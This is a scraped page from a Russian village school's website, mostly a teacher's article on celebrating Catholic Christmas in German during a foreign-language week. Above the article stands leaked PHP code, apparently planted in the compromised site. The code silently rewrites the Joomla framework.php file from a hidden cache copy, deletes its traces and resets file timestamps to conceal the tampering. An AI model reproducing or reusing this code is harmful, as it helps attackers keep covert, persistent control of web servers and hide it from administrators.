$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Немецкое Рождество

Сайт Сагарчинской средней школы

Будущее начинается здесь и сейчас!

ВХОД



Календарь



Опрос

Интересно ли Вам на этом сайте?
 

Статистика

Пользователи : 6
Статьи : 290
Просмотры материалов : 210441

На сайте

Сейчас 66 гостей онлайн

Вход в электронный дневник

Баннер

Вход в систему "Госуслуги"

Баннер

Персональные данные Дети

Баннер

Немецкое Рождество

Немецкое Рождество.

      В нашей школе много разных добрых традиций. Одной из таких является встреча католического  праздника Рождество на немецком языке. Празднование такого мероприятия необходимо для развития и поддержания интереса к изучению немецкого языка, для развития творческих способностей учащихся.  Это даёт ребятам возможность на практике применить свои знания, независимо от их уровня, и поэтому поверить в свои силы в изучении иностранного языка.

Целями проведения Рождества являются:

– усилить мотивацию к изучению иностранных языков,
– способствовать практическому владению речевой деятельностью,
– увеличивать активный языковой запас учащихся,
– стимулировать в целом их интеллектуальную и языковую активность,
– расширять общий кругозор школьников,
– повышать их культурный уровень,
– развивать творческие способности детей.

              Главным принципом Недели иностранного языка является вовлечение учащихся  независимо от уровня их знаний иностранного языка, в события Недели, предлагая им задания и мероприятия посильного уровня.

              Неделя иностранного языка приурочивается к католическому празднику 

« Рождество».

            Программа праздника очень насыщенна. Она включала в себя выступление учащихся младших классов с рифмовками и песнями на немецком языке, замечательное исполнение песен на немецком языке “Dezemberträme” и “Ich wünsche mir zum heilige Christ” ученицами 6 класса, исполнении  сценки « Пришествие Христа» многое другое.

Неделе иностранного языка предшествует большая подготовка. Прежде всего, это оформление школьных коридоров плакатами, стенгазетами и другими наглядными материалами, созданными учащимися по предварительным заданиям учителей. На этом этапе реализуется проектная методика преподавания иностранных языков, в частности творческие проекты. Творческие проекты предполагают соответствующее оформление результатов. В основе проекта лежит какая-либо проблема. Проблемы обсуждаются на уроках, формируются творческие группы. Следует договориться о планируемых результатах и форме их представления. В данном случае это совместная стенгазета или плакат или подборка тематических кроссвордов, ребусов, составленных самими учащимися. Тематика католическое рождество.  Чтобы решить проблему, учащимся требуется не только знание иностранного языка, но и владение большим объёмом предметных знаний, необходимых и достаточных для решения проблемы.

                 В заключении хочу отметить некоторые положительные моменты празднования католического Рождества. При планировании мероприятия я стараюсь представить  немецкий язык, способствуя развитию языкового плюрализма. Что очень актуально, т.к. последнее время соотношение иностранных языков в школах резко изменилось в пользу английского языка.

              И самое главное, Неделя иностранного языка способствует развитию творчества учащихся, создаёт эмоционально положительную атмосферу сотрудничества, направлена на положительное психологическое взаимодействие учителя и ученика.